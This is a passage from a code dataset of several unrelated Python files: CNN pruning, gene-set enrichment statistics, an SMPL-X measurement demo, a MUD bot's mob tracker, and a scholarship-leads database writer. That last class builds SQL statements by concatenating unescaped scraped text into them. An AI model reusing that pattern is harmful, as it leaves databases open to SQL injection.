default=\"out\")\n\n options, args = parser.parse_args()\n\n for fn in args:\n if fn.split('.')[-1] != \"png\":\n print(\"Image file argument must be in PNG format.\")\n exit(1)\n \n main(args, options.save, options.dest_dir)\n","repo_name":"prafael18/mc920","sub_path":"t1/object.py","file_name":"object.py","file_ext":"py","file_size_in_byte":5861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"71578106633","text":"import torch\nfrom copy import deepcopy\nfrom .pruning_engine_base import pruning_engine_base\nfrom .Pruning_criterion.L1norm.L1norm import L1norm\nfrom .Pruning_criterion.Taylor.Taylor import Taylor\nfrom .Pruning_criterion.KMean.K_L1norm import K_L1norm\nfrom .Pruning_criterion.KMean.K_Taylor import K_Taylor\nfrom .Pruning_criterion.KMean.K_Distance import K_Distance\n\nclass pruning_engine(pruning_engine_base):\n def __init__(self,pruning_method,pruning_ratio = 0,individual = False,**kwargs):\n \"\"\"\n Initialize the pruning engine.\n\n Args:\n pruning_method: The pruning method to be used.\n pruning_ratio: The pruning ratio to be applied.\n\n Return:\n None\n\n Logic:\n Initialize the pruning engine with the specified pruning method and pruning ratio.\n \"\"\"\n super().__init__(pruning_ratio,pruning_method)\n \n \n if (self.pruning_method == \"L1norm\"):\n self.l1norm_pruning = L1norm()\n self.pruning_criterion = self.l1norm_pruning.L1norm_pruning\n elif (self.pruning_method == \"Taylor\"):\n self.taylor_pruning = Taylor(\n tool_net=kwargs[\"tool_net\"],\n total_layer=kwargs[\"total_layer\"], \n taylor_loader=kwargs[\"taylor_loader\"],\n total_sample_size=kwargs[\"total_sample_size\"], \n hook_function=kwargs[\"hook_function\"])\n self.taylor_pruning.clear_mean_gradient_feature_map()\n self.taylor_pruning.Taylor_add_gradient()\n self.taylor_pruning.store_grad_layer(kwargs[\"layer_store_private_variable\"])\n self.pruning_criterion = self.taylor_pruning.Taylor_pruning\n elif (self.pruning_method == \"K-L1norm\"):\n self.K_L1norm_pruning = K_L1norm(list_k=kwargs[\"list_k\"],pruning_ratio=self.pruning_ratio)\n self.K_L1norm_pruning.store_k_in_layer(kwargs[\"layer_store_private_variable\"])\n \n self.pruning_criterion = self.K_L1norm_pruning.Kmean_L1norm\n elif (self.pruning_method == \"K-Taylor\"):\n \n \n \n self.K_Taylor_pruning = K_Taylor(\n list_k=kwargs[\"list_k\"],\n pruning_ratio=self.pruning_ratio,\n tool_net=kwargs[\"tool_net\"],\n total_layer=kwargs[\"total_layer\"], \n taylor_loader=kwargs[\"taylor_loader\"],\n total_sample_size=kwargs[\"total_sample_size\"], \n hook_function=kwargs[\"hook_function\"],\n layer_store_grad_featuremap=kwargs[\"layer_store_private_variable\"])\n self.K_Taylor_pruning.store_k_in_layer(kwargs[\"layer_store_private_variable\"])\n self.pruning_criterion = self.K_Taylor_pruning.Kmean_Taylor\n\n elif (self.pruning_method == \"K-Distance\"):\n self.K_Distance_Pruning = K_Distance(list_k=kwargs[\"list_k\"],pruning_ratio=self.pruning_ratio)\n self.K_Distance_Pruning.store_k_in_layer(kwargs[\"layer_store_private_variable\"])\n self.pruning_criterion = self.K_Distance_Pruning.Kmean_Distance\n self.remove_filter_idx_history = {\n \"previous_layer\":None,\n \"current_layer\":None\n }\n self.individual = individual\n\n\n def set_layer(self,layer,main_layer=False):\n \"\"\"\n Set the current layer for pruning.\n\n Args:\n layer: The layer to be pruned.\n\n Return:\n None\n\n Logic:\n Set the current layer to the given layer for further pruning operations.\n \"\"\"\n\n \n \n self.copy_layer = deepcopy(layer)\n \n if main_layer:\n if self.individual:\n self.remove_filter_idx_history = {\n \"previous_layer\":None,\n \"current_layer\":None\n }\n self.remove_filter_idx_history[\"previous_layer\"] = self.remove_filter_idx_history[\"current_layer\"]\n self.remove_filter_idx_history[\"current_layer\"] = None\n remove_filter_idx = self.pruning_criterion(self.copy_layer)\n number_pruning_filter = int(len(remove_filter_idx) * self.pruning_ratio)\n self.remove_filter_idx = remove_filter_idx[number_pruning_filter:]\n if (self.remove_filter_idx_history[\"previous_layer\"] is None):\n self.remove_filter_idx_history[\"previous_layer\"] = self.remove_filter_idx \n self.remove_filter_idx_history[\"current_layer\"] = self.remove_filter_idx\n return True\n \n \n def set_pruning_ratio(self,pruning_ratio):\n \"\"\"\n Set the pruning ratio for the current layer.\n\n Args:\n pruning_ratio: The pruning ratio to be applied to the current layer.\n\n Return:\n None\n\n Logic:\n Set the pruning ratio for the current layer to the specified value.\n \"\"\"\n self.pruning_ratio = 1-pruning_ratio\n if \"K_L1norm_pruning\" in self.__dict__:\n self.K_L1norm_pruning.set_pruning_ratio(1-pruning_ratio)\n if \"K_Distance_Pruning\" in self.__dict__:\n self.K_Distance_Pruning.set_pruning_ratio(1-pruning_ratio)\n if \"K_Taylor_pruning\" in self.__dict__:\n self.K_Taylor_pruning.set_pruning_ratio(1-pruning_ratio)\n\n def get_remove_filter_idx(self):\n \"\"\"\n Get the indices of removed filters.\n\n Args:\n None\n\n Return:\n remove_filter_idx: The indices of filters removed during pruning.\n\n Logic:\n Get the indices of filters that have been removed during the pruning process.\n \"\"\"\n return self.remove_filter_idx_history\n\n def remove_conv_filter_kernel(self):\n \"\"\"\n Remove filters and corresponding kernels from the convolutional layer.\n\n Args:\n None\n\n Return:\n None\n\n Logic:\n Remove filters and corresponding kernels from the current convolutional layer based on the pruning ratio.\n \"\"\"\n\n if self.copy_layer.bias is not None:\n self.copy_layer.weight.data,self.copy_layer.bias.data = self.base_remove_filter_by_index(weight=self.copy_layer.weight.data.clone(),remove_filter_idx=self.remove_filter_idx_history[\"current_layer\"],bias=self.copy_layer.bias.data.clone())\n self.copy_layer.weight.data = self.base_remove_kernel_by_index(weight=self.copy_layer.weight.data.clone(), remove_filter_idx=self.remove_filter_idx_history[\"previous_layer\"])\n self.copy_layer.out_channels = self.copy_layer.weight.shape[0]\n self.copy_layer.in_channels = self.copy_layer.weight.shape[1]\n else:\n self.copy_layer.weight.data = self.base_remove_filter_by_index(weight=self.copy_layer.weight.data.clone(),remove_filter_idx=self.remove_filter_idx_history[\"current_layer\"])\n self.copy_layer.weight.data = self.base_remove_kernel_by_index(weight=self.copy_layer.weight.data.clone(), remove_filter_idx=self.remove_filter_idx_history[\"previous_layer\"])\n self.copy_layer.out_channels = self.copy_layer.weight.shape[0]\n self.copy_layer.in_channels = self.copy_layer.weight.shape[1]\n \n return self.copy_layer\n \n def remove_Bn(self,remove_filter_idx):\n \"\"\"\n Remove filters from the Batch Normalization layer.\n\n Args:\n None\n\n Return:\n None\n\n Logic:\n Remove filters from the Batch Normalization layer based on the pruning ratio.\n \"\"\" \n self.copy_layer.weight.data,\\\n self.copy_layer.bias.data,\\\n self.copy_layer.running_mean.data,\\\n self.copy_layer.running_var.data = self.base_remove_filter_by_index(\n self.copy_layer.weight.data.clone(), \n remove_filter_idx,\n bias=self.copy_layer.bias.data.clone(),\n mean=self.copy_layer.running_mean.data.clone(),\n var=self.copy_layer.running_var.data.clone()\n )\n self.copy_layer.num_features = self.copy_layer.weight.shape[0]\n return self.copy_layer\n \n def remove_filter_by_index(self,remove_filter_idx,linear=False,group=False):\n \"\"\"\n Remove filters from the current layer based on the given indices.\n\n Args:\n idx: Indices of filters to be removed.\n\n Return:\n None\n\n Logic:\n Remove filters from the current layer based on the given indices.\n \"\"\"\n if self.copy_layer.bias is not None:\n\n self.copy_layer.weight.data,\\\n self.copy_layer.bias.data = self.base_remove_filter_by_index(\n weight=self.copy_layer.weight.data.clone(),\n remove_filter_idx=remove_filter_idx,\n bias=self.copy_layer.bias.data.clone(),\n linear=linear\n )\n else:\n self.copy_layer.weight.data = self.base_remove_filter_by_index(\n weight=self.copy_layer.weight.data.clone(),\n remove_filter_idx=remove_filter_idx,\n linear=linear\n )\n if linear:\n self.copy_layer.out_features = self.copy_layer.weight.shape[0]\n else:\n self.copy_layer.out_channels = self.copy_layer.weight.shape[0]\n \n if group:\n self.copy_layer.groups = self.copy_layer.weight.shape[0]\n self.copy_layer.in_channels = self.copy_layer.weight.shape[1]\n self.copy_layer.out_channels = self.copy_layer.weight.shape[0]\n return self.copy_layer\n\n def remove_kernel_by_index(self,remove_filter_idx,linear=False):\n \"\"\"\n Remove kernels from the current layer based on the given indices.\n\n Args:\n idx: Indices of kernels to be removed.\n\n Return:\n None\n\n Logic:\n Remove kernels from the current layer based on the given indices.\n \"\"\"\n self.copy_layer.weight.data = self.base_remove_kernel_by_index(\n weight=self.copy_layer.weight.data.clone(),\n remove_filter_idx=remove_filter_idx,\n linear=linear\n \n )\n if linear:\n self.copy_layer.in_features = self.copy_layer.weight.shape[1]\n else:\n self.copy_layer.in_channels = self.copy_layer.weight.shape[1]\n\n return self.copy_layer","repo_name":"MIC-Laboratory/CNN-Pruning-Engine","sub_path":"Pruning_engine/pruning_engine.py","file_name":"pruning_engine.py","file_ext":"py","file_size_in_byte":10389,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"8270303318","text":"#!/usr/bin/env python3\n\nimport pandas as pd\nimport numpy as np\nfrom scipy.special import loggamma\n\n\ndef log_binom(n,k):\n \"\"\"Numerical stable binomial coeffient\"\"\"\n n1 = loggamma(n+1)\n d1 = loggamma(k+1)\n d2 = loggamma(n-k + 1)\n return n1 - d1 -d2\n\ndef fex(target_set : list,\n query_set : list,\n full_set : list,\n alpha = 0.05,\n ):\n \"\"\"Fischer Exact test\"\"\"\n \n ts = set(target_set)\n qs = set(query_set)\n fs = set(full_set)\n \n qs_and_ts = qs.intersection(ts)\n qs_not_ts = qs.difference(ts)\n ts_not_qs = fs.difference(qs).intersection(ts)\n not_ts_not_qs = fs.difference(qs).difference(ts)\n \n x = np.zeros((2,2))\n x[0,0] = len(qs_and_ts)\n x[0,1] = len(qs_not_ts)\n x[1,0] = len(ts_not_qs)\n x[1,1] = len(not_ts_not_qs)\n \n p1 = log_binom(x[0,:].sum(), x[0,0])\n p2 = log_binom(x[1,:].sum(),x[1,0])\n p3 = log_binom(x.sum(), x[:,0].sum())\n \n p = np.exp( p1 + p2 - p3)\n \n return p\n\n\ndef select_set_full(datum,\n names,\n target_set\n ):\n \"\"\"select smallest subset with full coverage\n \n Selects the smallest ranked\n subset of genes within a\n spot which contains all of the genes of \n interest\n \n \n \"\"\"\n \n sidx = np.fliplr(np.argsort(datum,axis = 1)).astype(int)\n set_list = list()\n for spot in range(sidx.shape[0]):\n snames = [names[x] for x in sidx[spot,:]]\n fidx = [k for k,x in enumerate(snames) if x in target_set]\n fidx = np.max(fidx)\n set_list.append(snames[0:(fidx +1)])\n \n return set_list\n\n\n\ndef select_set_cumsum(datum,\n names,\n mass_proportion = 0.95):\n \n \"\"\"select top genes in set\n \n Selects the top G genes which constitutes\n thrs fraction of the totatl observed counts\n \n \"\"\"\n \n if len(datum.shape) != 2:\n reshape = True\n datum = datum.reshape(1,-1)\n else:\n reshape = False\n \n sidx = np.fliplr(np.argsort(datum,axis = 1)).astype(int)\n cumsum = np.cumsum(np.take_along_axis(datum,sidx,axis=1),\n axis = 1)\n \n \n lim = np.max(cumsum,axis = 1) * mass_proportion\n lim = lim.reshape(-1,1)\n \n q = np.argmin(cumsum <= lim,axis = 1)\n set_list = [names[sidx[x,0:q[x]]].tolist() for x \\\n in range(datum.shape[0])]\n \n if reshape:\n datum = datum.reshape(-1,)\n \n return set_list\n\ndef sampleValues(x,\n n_samples,\n n_genes):\n\n if len(x.shape) < 2:\n reshape = True\n shape = x.shape\n x = x.reshape(1,-1)\n else:\n reshape = False\n\n vals = np.zeros((x.shape[0],n_samples))\n for samp in range(n_samples):\n genes = np.floor(np.random.random(n_genes) * x.shape[1]).astype(int)\n vals[:,samp] = x[:,genes].sum(axis = 1)\n\n if reshape:\n x = x.reshape(shape)\n vals = vals.reshape(-1,)\n\n return vals\n\n\ndef enrichment_score_sampling(cnt : pd.DataFrame,\n target_set : list,\n mass_proportion,\n ):\n \"\"\"\n Bases enrichment score on comparision to \n multiple sampled set of genes. Attractive but\n unfeasible\n \n \"\"\"\n \n inter = cnt.columns.intersection(pd.Index(target_set))\n n_targets = len(target_set)\n nsamples = 100000\n \n # compute sum of target set for all spots\n selscore = cnt.loc[:,inter].values.sum(axis=1).reshape(-1,1)\n \n svals = sampleValues(x = cnt.values,\n n_genes = n_targets,\n n_samples = nsamples,\n )\n \n \n pvals = (selscore < svals).sum(axis=1) /nsamples\n pvals[pvals == 0] = pvals[pvals != 0].min()\n \n return -np.log(pvals).reshape(-1,)\n \n \ndef enrichment_score_fischer(cnt : pd.DataFrame,\n target_set : list,\n mass_proportion : float,\n ):\n \n \"\"\"Compute enrichment score\n \n computes the enrichment score for all\n samples (rows) based on a target_set.\n \n \"\"\"\n \n pvals = []\n query_all = cnt.columns.values\n query_top_list = select_set_cumsum(cnt.values,\n query_all,\n mass_proportion = mass_proportion,\n )\n \n n_in_set = len(set(target_set).intersection(set(query_all)))\n print(f'{n_in_set} / {len(target_set)} of target genes present in data')\n \n full_set = query_all.tolist() + target_set\n print(f'full-set cardinality {len(set(full_set))}')\n print(f'target-set cardinality {len(set(target_set))}')\n \n for ii in range(len(query_top_list)):\n p = fex(target_set,query_top_list[ii], full_set)\n pvals.append(p)\n \n pvals = np.array(pvals)\n \n return -np.log(pvals)\n","repo_name":"almaan/STDGE","sub_path":"enrich.py","file_name":"enrich.py","file_ext":"py","file_size_in_byte":4968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"11508606093","text":"import sys\nimport os\nimport os.path as osp\n\nos.environ['PYOPENGL_PLATFORM'] = 'egl'\n\nfrom threadpoolctl import threadpool_limits\nfrom tqdm import tqdm\nimport torch\nimport argparse\nimport trimesh\nfrom loguru import logger\nimport numpy as np\nimport smplx\nfrom body_measurements import BodyMeasurements\nfrom attributes.utils.renderer import Renderer\nimport matplotlib.pyplot as plt\nfrom PIL import ImageDraw, ImageFont\n\n\n@torch.no_grad()\ndef main(\n demo_input_folder: os.PathLike = 'demo_input',\n demo_output_folder: os.PathLike = 'demo_output',\n meas_definition_path: os.PathLike = '',\n meas_vertices_path: os.PathLike = '',\n smpl_model_path: os.PathLike = 'data/body_models/smpl',\n gender: str = 'neutral',\n num_betas: int = 10,\n render: bool = True,\n) -> None:\n\n device = torch.device('cuda')\n if not torch.cuda.is_available():\n logger.error('CUDA is not available!')\n sys.exit(3)\n\n os.makedirs(demo_output_folder, exist_ok=True)\n\n npz_files = sorted(os.listdir(demo_input_folder))\n npz_files = [x for x in npz_files if x.endswith('npz')]\n\n body_measurements = BodyMeasurements(\n {'meas_definition_path': meas_definition_path,\n 'meas_vertices_path': meas_vertices_path},\n ).to(device)\n\n smpl= smplx.create(\n model_path=smpl_model_path,\n gender=gender,\n num_betas=num_betas,\n model_type='smplx'\n ).to(device)\n\n if render:\n renderer = Renderer(\n is_registration=False\n )\n\n for npz_file in npz_files:\n print(f'Processing: {npz_file}')\n\n # read betas\n data = np.load(osp.join(demo_input_folder, npz_file))\n betas = torch.from_numpy(data['betas']).to(device).unsqueeze(0)\n\n # smpl function & shaped body\n body = smpl(betas=betas)\n shaped_vertices = body['v_shaped']\n shaped_triangles = shaped_vertices[:,smpl.faces_tensor]\n\n # Compute the measurements on the body\n measurements = body_measurements(\n shaped_triangles)['measurements']\n \n # render shaped body\n if render:\n pred_mesh = trimesh.Trimesh(shaped_vertices.cpu().numpy()[0], smpl.faces)\n pred_img = renderer.render(pred_mesh)\n \n\n # print result\n mmts_str = ' Virtual measurements: '\n for k, v in measurements.items():\n value = v['tensor'].item()\n unit = 'kg' if k == 'mass' else 'm'\n mmts_str += f' {k}: {value:.2f} {unit}'\n print(mmts_str)\n\n # add measurements to image and save image\n if render:\n font = ImageFont.truetype(\"../samples/OpenSans-Regular.ttf\", size=24)\n ImageDraw.Draw(pred_img).text(\n (0, 10), mmts_str, (0, 0, 0), font=font\n )\n pred_img.save(osp.join(demo_output_folder, npz_file.replace('npz', 'png')))\n\n\nif __name__ == '__main__':\n # torch.multiprocessing.set_start_method('fork')\n torch.backends.cudnn.benchmark = True\n torch.backends.cudnn.deterministic = False\n\n arg_formatter = argparse.ArgumentDefaultsHelpFormatter\n description = 'PyTorch SMPL-X Regressor Demo'\n parser = argparse.ArgumentParser(formatter_class=arg_formatter,\n description=description)\n\n parser.add_argument('--output-folder', dest='output_folder',\n default='demo_output', type=str,\n help='The folder where the demo renderings will be saved')\n parser.add_argument('--input-folder', dest='input_folder',\n default='demo_input', type=str,\n help='The folder where the demo npz files are stored')\n parser.add_argument('--meas_definition_path', dest='meas_definition_path',\n default='../data/utility_files/measurements/measurement_defitions.yaml', \n type=str, help='Path to measurement definitions')\n parser.add_argument('--meas_vertices_path', dest='meas_vertices_path',\n default='../data/utility_files/measurements/smplx_measurements.yaml', type=str,\n help='Path to measurement vertices')\n parser.add_argument('--smpl_model_path', dest='smpl_model_path',\n default='../data/body_models', type=str,\n help='Path to smpl model folder')\n parser.add_argument('--num_betas', dest='num_betas',\n default=10, type=int,\n help='number of betas smpl model uses')\n parser.add_argument('--gender', dest='gender',\n default='neutral', type=str,\n help='gender of smpl model')\n \n\n args = parser.parse_args()\n\n main( \n demo_input_folder=args.input_folder,\n demo_output_folder=args.output_folder, \n meas_definition_path=args.meas_definition_path,\n meas_vertices_path=args.meas_vertices_path,\n smpl_model_path=args.smpl_model_path,\n gender=args.gender,\n num_betas=args.num_betas\n )","repo_name":"muelea/shapy","sub_path":"measurements/virtual_measurements.py","file_name":"virtual_measurements.py","file_ext":"py","file_size_in_byte":5101,"program_lang":"python","lang":"en","doc_type":"code","stars":265,"dataset":"github-code","pt":"27"} +{"seq_id":"24470067131","text":"\n# import statistics as stats # python 3.4\nimport math\n\nfrom reactions.BotReactions import BotReactionWithFlag\nimport comm.RegexStore as R\nfrom misc_functions import magentaprint\nfrom reactions.referencing_list import ReferencingList\n\nclass Mobs(BotReactionWithFlag):\n# class Mobs(BotReactionWithFlag, ReferencingList):\n # I will give this object MONSTER_LIST because that provides a place for possible extended functionality\n # in the future, such as correcting targets.\n\n # The main reason for this object is too further clean up MudReaderThread, which is ALMOST readable/maintainable now.\n regex_cart = [\n R.mob_arrived, R.mob_died, R.mob_fled, R.mob_defeated, R.mob_wandered, R.mob_left,\n R.mob_joined1, R.mob_joined2, R.mob_attacked, R.you_attack, R.mob_aggro\n ]\n\n def __init__(self):\n self.list = ReferencingList([])\n self.attacking = []\n self.singles = ['a', 'an', 'the']\n self.numbers = [\n 'two', 'three', 'four', 'five', 'six', 'seven', 'eight', 'nine', 'ten', 'eleven', 'twelve', 'thirteen',\n 'fourteen', 'fifteen' , 'sixteen', 'seventeen', 'eighteen', 'nineteen', 'twenty'\n ]\n self.numbers.extend([str(i) + \" \" for i in range(21, 200)])\n self.damage = []\n self.chase = ''\n self.chase_exit = ''\n\n def read_match(self, m):\n if m.group('mob1'):\n return m.group('mob1').strip()\n elif m.group('mob2'):\n # magentaprint(\"Mobs mob2\")\n if m.group('mob2').startswith('The '):\n return m.group('mob2').partition(' ')[2].strip()\n else:\n return m.group('mob2').strip()\n elif m.group('mob3'):\n # magentaprint(\"Mobs mob3\")\n return m.group('mob3').strip()\n\n def read_mobs(self, arrived_mobs):\n mob_parse = arrived_mobs.partition(' ')\n first_word = mob_parse[0].lower()\n\n if first_word in self.singles:\n return [mob_parse[2]]\n elif first_word in self.numbers:\n magentaprint(\"Mobs mobs: \" + arrived_mobs + \", first_word: \" + first_word)\n return [remove_plural(mob_parse[2])] * (int(self.numbers.index(first_word)) + 2)\n else:\n # Named mob\n magentaprint(\"Mobs arrived no article: first_word \" + first_word + \" mobs: \" + arrived_mobs)\n # self.list.append(mob_parse[0])\n return [mob_parse[0]]\n\n def notify(self, r, m_obj):\n # We'll let Cartography handle the initialization of monster_list with the area regex since it already does a great job.\n if r in R.mob_arrived:\n self.list.add_from_list(self.read_mobs(m_obj.group('mobs')))\n elif r in R.mob_died:\n if self.read_match(m_obj) in self.list:\n self.list.remove(self.read_match(m_obj))\n magentaprint(\"Mobs notify matched \" + str(self.read_match(m_obj)) + \" in self.attacking: \" + str(self.read_match(m_obj) in self.attacking) + \", self.attacking: \" + str(self.attacking))\n if self.read_match(m_obj) in self.attacking:\n self.attacking.remove(self.read_match(m_obj)) # TODO: if a mob is one-shot, it's not removed because the You attacked notify is after\n magentaprint('Mobs damage ' + str(self.damage) + ', s=' + str(sum(self.damage)) + ', m=' + str(round(self.mean(self.damage), 1)) + ', stdev=' + str(round(self.stdev(self.damage), 1)) + ', h=' + str(round(1 - sum([x == 0 for x in self.damage])/max(len(self.damage),1), 2)))\n # m = sum(self.damage) / max(len(self.damage), 1)\n # s = sum(self.damage - [m]*len(self.damage))\n # magentaprint('Mobs damage ' + str(self.damage) + ', s=' + str(sum(self.damage)) + ', m=' + str(stats.mean(self.damage)) + ', stdev=' + str(stats.stdev(self.damage)) + ', h=' + str(round(1 - sum([x == 0 for x in self.damage])/len(self.damage), 2)))\n elif r in R.mob_fled: # Leave mobs.attacking populated. (?) might help to chase mobs that don't block you (chase currently relies on that.)\n if self.read_match(m_obj) in self.list:\n self.list.remove(self.read_match(m_obj))\n self.chase = self.read_match(m_obj)\n self.chase_exit = m_obj.group('exit')\n elif (r in R.mob_wandered or r in R.mob_left) and self.read_match(m_obj) in self.list:\n self.list.remove(self.read_match(m_obj))\n elif r in R.mob_joined1 or r in R.mob_joined2:\n self.attacking.append(self.read_match(m_obj))\n elif r in R.mob_attacked:\n # c = self.attacking.count(m_obj.group('mob').strip())\n # if c == 0:\n # self.attacking.append(m_obj.group('mob'))\n # # Commenting incorrect code\n # # else:\n # # if m_obj.group('nth'):\n # # nth = int(m_obj.group('nth')[0:len(m_obj.group('nth'))-2])\n # # self.attacking.extend([m_obj.group('mob')] * max(nth - c, 0))\n c = self.attacking.count(self.read_match(m_obj))\n if c == 0:\n self.attacking.append(self.read_match(m_obj))\n # TODO: remember if 1st and 2nd mobs are attacking and ensure attacking has length 2 if necessary\n if 'd' in m_obj.groupdict().keys():\n self.damage.append(int(m_obj.group('d')))\n else:\n self.damage.append(0)\n if r in R.you_attack or r in R.mob_aggro:\n self.damage = []\n\n self.attacking.append(self.read_match(m_obj))\n magentaprint(\"mobs.list \" + str(self.list) + \"; notification from regex: \" + str(r[0:min(10, len(r))]))\n if self.attacking:\n magentaprint(\"mobs.attacking \" + str(self.attacking))\n super().notify(r, m_obj)\n\n def parse_mob_string(self, s):\n # You see (two kobold children, a dustman).\n # (Two lay followers) just arrived.\n s = s.replace(\"\\n\\r\", ' ')\n # comma_items = [comma_item.strip().lower() for comma_item in s.split(',')]\n\n # return [Mobs.remove_plural(m.strip()) for m in mob_match.group(1).split(',')]\n m_list = []\n # for c in comma_items:\n for comma_item in s.split(','):\n m = comma_item.strip().lower()\n\n if m[len(m)-4:len(m)-2] == ' (' and m[len(m)-1] == ')':\n # m = remove_good_evil(m)\n m = m[0:len(m)-4]\n\n if any(m.startswith(single + ' ') for single in self.singles):\n # m_dict[m.partition(' ')[2]] = 1\n m_list.extend([m.partition(' ')[2]])\n # number_check = [m.startswith(n) for n in numbers]\n elif any(m.startswith(n + ' ') for n in self.numbers):\n m_list.extend([remove_plural(m.partition(' ')[2])] * (self.numbers.index(m.split(' ')[0]) + 2))\n else:\n m_list.append(m)\n\n # for n in range(0, len(numbers)):\n # if c.startswith(numbers[n] + ' '):\n # # m_dict[m.partition(' ')[2]] = n + 2\n # c_singular = remove_plural(c)\n # m_list.extend([c_singular.partition(' ')[2]] * (n + 2))\n # break\n\n # return list(m_dict.keys())\n return m_list\n\n def mean(self, a):\n return sum(a)/max(len(a),1)\n\n def stdev(self, a):\n # stdev excluding zeroes\n m = self.mean(a)\n l = len(a) - sum([x==0 for x in a])\n # return math.sqrt(1/len(a) * sum([(x-m)^2 for x in a]))\n return math.sqrt(1/max(l,1) * sum([pow((x-m),2) for x in a]))\n\ndef remove_plural(m):\n # if mob_string.endswith('s'):\n # mob_string = mob_string[0:len(mob_string)-1]\n # elif mob_string.endswith('ses'):\n # mob_string = mob_string[0:len(mob_string)-3]\n # m = mob_string\n\n # if capitals:\n # singles = [s.title() for s in singles]\n # numbers = [n.title() for n in numbers]\n # else:\n # singles = [s.lower() for s in singles[0:2]]\n # singles.append('The ')\n # numbers = [n.lower() for n in numbers]\n\n # if any([m.startswith(s) for s in singles]):\n # # m_dict[m.partition(' ')[2]] = 1\n # return m.partition(' ')[2]\n # number_check = [m.startswith(n) for n in numbers]\n if m.endswith('sses'):\n return m[0:len(m)-2]\n elif m.endswith('s'):\n return m[0:len(m)-1]\n elif m.endswith('children'):\n return m[0:len(m)-3]\n elif m.endswith(' mice'):\n return m[0:len(m)-4] + 'mouse'\n else:\n return m\n\n # for n in range(0, len(numbers)):\n # if m.startswith(numbers[n]):\n # # m_dict[m.partition(' ')[2]] = n + 2\n # m_list.extend([m.partition(' ')[2]] * (n + 2))\n\ndef remove_good_evil(m):\n if m.lower().endswith(' (g)') or m.lower().endswith(' (e)'):\n return m[0:len(m)-5]\n","repo_name":"lbaribeau/los-helper","sub_path":"main/reactions/Mobs.py","file_name":"Mobs.py","file_ext":"py","file_size_in_byte":8863,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"4431119258","text":"def solution(name, yearning, photo):\n answer = []\n\n for one in photo:\n total_score = 0\n for person in one:\n if person in name:\n index = name.index(person)\n total_score += yearning[index]\n\n answer.append(total_score)\n\n return answer\n\n\nname = []\nyearing = []\nphoto = []\n\nprint(solution())\n","repo_name":"birdieHyun/Algorithm_Python","sub_path":"programmers/lv1/Memory.py","file_name":"Memory.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"30243740557","text":"from Classes.SUDBConnect import SUDBConnect\nfrom Classes.CleanText import CleanText\nimport re\nimport time\n\n\nclass InsertIefaLeadArrayIntoIefaLeadsDB(object):\n def __init__(self, iefaLeadArray, fundingClassification, badScholarshipClassification):\n self.iefaLeadArray = iefaLeadArray\n self.fundingClassification = fundingClassification\n self.badScholarshipClassificaion = badScholarshipClassification\n self.db = SUDBConnect()\n self.fileSystemDB = SUDBConnect(destination='filesystem')\n\n self.name = self.iefaLeadArray[0]\n self.url = self.iefaLeadArray[1]\n self.url = CleanText.replaceSingleQuotesWithTwoSingleQuotes(self.url)\n self.sponsor = self.iefaLeadArray[2]\n self.submissionDeadline = self.iefaLeadArray[3]\n self.majors = self.iefaLeadArray[4]\n self.amount = self.iefaLeadArray[5]\n self.description = self.iefaLeadArray[6]\n self.otherCriteria = self.iefaLeadArray[7]\n self.numberAwards = self.iefaLeadArray[8]\n self.hostInstitution = self.iefaLeadArray[9]\n self.includes = self.iefaLeadArray[10]\n self.nationalityRequired = self.iefaLeadArray[11]\n self.hostCountries = self.iefaLeadArray[12]\n self.sourceWebsite = self.iefaLeadArray[13]\n self.sourceText = self.iefaLeadArray[14]\n self.date = time.strftime('%Y%m%d')\n\n def writeFileToDisk(self):\n tableName = 'IefaLeads'\n user = 'Kya'\n website = re.sub('Leads', '', tableName)\n columns = self.db.getColumnNamesFromTable(tableName)\n currentRow = self.db.getRowsDB(\n \"select * from dbo.IefaLeads where Name='\" + self.name + \"' and Url='\" + self.url + \"'\")[0]\n self.fileSystemDB.writeFile(columns, currentRow, user, website, self.url, self.date)\n\n def checkIfAlreadyInDatabase(self):\n matchingRow = self.db.getRowsDB(\n \"select * from dbo.IefaLeads where Name='\" + self.name + \"' and Url='\" + self.url + \"'\")\n if matchingRow != []:\n return True\n else:\n return False\n\n def insertUpdateLead(self):\n if not self.checkIfAlreadyInDatabase():\n self.db.insertUpdateOrDeleteDB(\n \"INSERT INTO dbo.IefaLeads (Name, Url, Sponsor, SubmissionDeadline, Majors, Amount, Description, OtherCriteria, NumberAwards, HostInstitution, Includes, NationalityRequired, HostCountries, SourceWebsite, SourceText, Date, Tag, BadScholarship) VALUES (N'\" + self.name + \"', N'\" + self.url + \"', N'\" + self.sponsor + \"', N'\" + self.submissionDeadline + \"', N'\" + self.majors + \"', N'\" + self.amount + \"', N'\" + self.description + \"', N'\" + self.otherCriteria + \"', N'\" + self.numberAwards + \"', N'\" + self.hostInstitution + \"', N'\" + self.includes + \"', N'\" + self.nationalityRequired + \"', N'\" + self.hostCountries + \"', N'\" + self.sourceWebsite + \"', N'\" + self.sourceText + \"', '\" + self.date + \"', '\" + self.fundingClassification + \"', '\" + self.badScholarshipClassificaion + \"')\")\n self.writeFileToDisk()\n else:\n self.db.insertUpdateOrDeleteDB(\n \"update dbo.IefaLeads set Sponsor=N'\" + self.sponsor + \"', SubmissionDeadline=N'\" + self.submissionDeadline + \"', Majors=N'\" + self.majors + \"', Amount=N'\" + self.amount + \"', Description=N'\" + self.description + \"', OtherCriteria=N'\" + self.otherCriteria + \"', NumberAwards=N'\" + self.numberAwards + \"', HostInstitution=N'\" + self.hostInstitution + \"', Includes=N'\" + self.includes + \"', NationalityRequired=N'\" + self.nationalityRequired + \"', HostCountries=N'\" + self.hostCountries + \"', SourceWebsite=N'\" + self.sourceWebsite + \"', SourceText=N'\" + self.sourceText + \"', Date='\" + self.date + \"', Tag='\" + self.fundingClassification + \"', BadScholarship='\" + self.badScholarshipClassificaion + \"' where Name='\" + self.name + \"' and Url='\" + self.url + \"'\")\n 